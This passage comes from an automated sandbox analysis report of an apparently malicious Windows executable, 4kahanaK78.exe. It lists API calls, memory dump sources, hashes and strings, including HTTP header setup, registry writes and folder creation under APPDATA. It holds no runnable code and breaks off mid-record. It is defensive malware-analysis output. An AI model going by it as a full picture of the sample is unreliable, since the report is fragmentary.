                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                    • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                    • String ID: APPDATA$TMPDIR
                                    • API String ID: 1838500112-4048745339
                                    • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                    • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                    • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                    • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                    Strings
                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: HeadersHttpRequest$H_prolog3_
                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                    • API String ID: 1254599795-787135837
                                    • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                    • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                    • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                    • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction ID: acaa041e7243b144c48e04bfb57c0b5a001fb5848c61560116689d056185857d
                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction Fuzzy Hash: 9721AB76900108BFDB41EF95CC80DDE7BB9BF08644F01856AF6559B222DB36EA44DB80
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                    • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                    • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                    • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                    APIs
                                    • _free.LIBCMT ref: 04B51362
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B5136E
                                    • _free.LIBCMT ref: 04B51379
                                    • _free.LIBCMT ref: 04B51384
                                    • _free.LIBCMT ref: 04B5138F
                                    • _free.LIBCMT ref: 04B5139A
                                    • _free.LIBCMT ref: 04B513A5
                                    • _free.LIBCMT ref: 04B513B0
                                    • _free.LIBCMT ref: 04B513BB
                                    • _free.LIBCMT ref: 04B513C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction ID: 2a10a7805f43cdd66fb67693c0c57ce734796f275dd78e4ecda33884c6c57685
                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction Fuzzy Hash: A821B87A90011CFFDB05EF99D880EDDBFB8BF08244B4051A6E9259B171DB31EA54DB80
                                    APIs
                                    • _free.LIBCMT ref: 004110FB
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 00411107
                                    • _free.LIBCMT ref: 00411112
                                    • _free.LIBCMT ref: 0041111D
                                    • _free.LIBCMT ref: 00411128
                                    • _free.LIBCMT ref: 00411133
                                    • _free.LIBCMT ref: 0041113E
                                    • _free.LIBCMT ref: 00411149
                                    • _free.LIBCMT ref: 00411154
                                    • _free.LIBCMT ref: 00411162
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                    • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                    • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                    • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                    APIs
                                    • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                    • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                    • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                    • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                    • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                    • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                    • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2751267872-393685449
                                    • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                    • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                    • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                    • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 3409252457-0
                                    • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                    • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                    • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                    • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B492CD), ref: 04B492FB
                                    • GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B492CD), ref: 04B49306
                                    • GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B492CD), ref: 04B49317
                                    • GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B49329
                                    • GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B49337
                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B492CD), ref: 04B4935A
                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B49376
                                    • CloseHandle.KERNEL32(0042AF60,?,?,04B492CD), ref: 04B49386
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                    • String ID:
                                    • API String ID: 2565136772-0
                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction ID: 096d5d5beab73883d0c31ded6276062fec5c07aa1a4af502f75caaa1d3304148
                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction Fuzzy Hash: 0B01B5F1F40321ABD7202F74AD09B9B3BA8EBCDB11B594071FD05D21A4DBACD4019A6A
                                    APIs
                                    • __RTC_Initialize.LIBCMT ref: 1000291D
                                    • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Initialize___scrt_uninitialize_crt
                                    • String ID:
                                    • API String ID: 2442719207-0
                                    • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                    • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                    • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                    • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                    • Sleep.KERNEL32(000005DC), ref: 00405620
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CloseCreateOpenSleepValue
                                    • String ID: Q)9$get
                                    • API String ID: 4111408922-3206504531
                                    • Opcode ID: fcdd176a8f4fe517d9bc9ffdb6ab66f0d30b6f13fbb174a808a75cb1d6ca5279
                                    • Instruction ID: 30df8e47a04e2e06ac7afafe3262d146b2e53c9795b1f60deb682199623e9688
                                    • Opcode Fuzzy Hash: fcdd176a8f4fe517d9bc9ffdb6ab66f0d30b6f13fbb174a808a75cb1d6ca5279
                                    • Instruction Fuzzy Hash: 8F418271610108BFEB18CF24CD85BDE7B66EF49304FA0812DF915AA1D5D779EA80CB58
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA017
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 04CEA01F
                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA0A8
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 04CEA0D3
                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA128
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction ID: 320d9273309d4f661b30fab8b9268647b8c7b7509f23bd977647be4226ea204a
                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction Fuzzy Hash: 7D41E534A00209EFCF10DF6AC884ABEBBB6AF45328F148055E815AB351D737BA15CB91
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                    • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                    • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                    • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                    • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                    • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                    • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                    • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe$obA
                                    • API String ID: 0-381446164
                                    • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                    • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                    • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                    • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                    • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                    • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                    • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction ID: d115a3c1556e8c7a8b1246ba41cab4f2983be82c3d72136885d86cadfd654bff
                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction Fuzzy Hash: 01119632741704B6F6A0F770CC06FCB7B9E6F00708F408818BB9966152D67DB545A761
                                    APIs
                                      • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                    • _free.LIBCMT ref: 1000C60D
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 1000C618
                                    • _free.LIBCMT ref: 1000C623
                                    • _free.LIBCMT ref: 1000C677
                                    • _free.LIBCMT ref: 1000C682
                                    • _free.LIBCMT ref: 1000C68D
                                    • _free.LIBCMT ref: 1000C698
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                    • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                    • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                    • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                    APIs
                                      • Part of subcall function 04B572B1: _free.LIBCMT ref: 04B572D6
                                    • _free.LIBCMT ref: 04B57337
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B57342
                                    • _free.LIBCMT ref: 04B5734D
                                    • _free.LIBCMT ref: 04B573A1
                                    • _free.LIBCMT ref: 04B573AC
                                    • _free.LIBCMT ref: 04B573B7
                                    • _free.LIBCMT ref: 04B573C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction ID: f3638e34a91a9eb389efc8ebeddf53615fc296e693e6a5b1e9022694aa798f79
                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction Fuzzy Hash: C1117F31A50B08BAE920B7B1DC05FCBF79CEF05704F800858FBAD760B0DA66B5145660
                                    APIs
                                      • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                    • _free.LIBCMT ref: 004170D0
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 004170DB
                                    • _free.LIBCMT ref: 004170E6
                                    • _free.LIBCMT ref: 0041713A
                                    • _free.LIBCMT ref: 00417145
                                    • _free.LIBCMT ref: 00417150
                                    • _free.LIBCMT ref: 0041715B
                                    Memory Dump Source
